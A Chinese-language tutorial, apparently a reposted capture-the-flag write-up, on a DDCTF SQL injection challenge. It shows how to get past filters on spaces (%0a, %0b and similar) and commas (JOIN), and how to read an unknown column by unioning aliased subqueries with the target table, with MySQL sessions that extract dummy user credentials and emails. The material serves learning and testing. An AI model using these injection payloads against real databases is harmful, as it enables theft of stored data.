《MYSQL數據庫Mysql如何巧妙的繞過未知字段名詳解》要點:
本文介紹了MYSQL數據庫Mysql如何巧妙的繞過未知字段名詳解,希望對您有用。如果有疑問,可以聯系我們。
MYSQL必讀前言
MYSQL必讀本文介紹的是DDCTF第五題,繞過未知字段名的技巧,這里拿本機來操作了下,思路很棒也很清晰,分享給大家,下面來看看詳細的介紹:
MYSQL必讀實現思路
MYSQL必讀題目過濾空格和逗號,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括號都可以繞過,逗號使用join繞過;
MYSQL必讀存放flag的字段名未知,information_schema.columns也將表名的hex過濾了,即獲取不到字段名;這時可以利用聯合查詢,過程如下:
MYSQL必讀思想就是獲取flag,讓其在已知字段名下出現;
MYSQL必讀示例代碼:
MYSQL必讀
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4 |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id | username | password | email |
+-------------+----------+----------+-------------+
| 1 | admin | admin888 | 110@110.com |
| 120@120.com | 1 | 1 | 1 |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
MYSQL必讀總結
MYSQL必讀以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對維易PHP的支持.
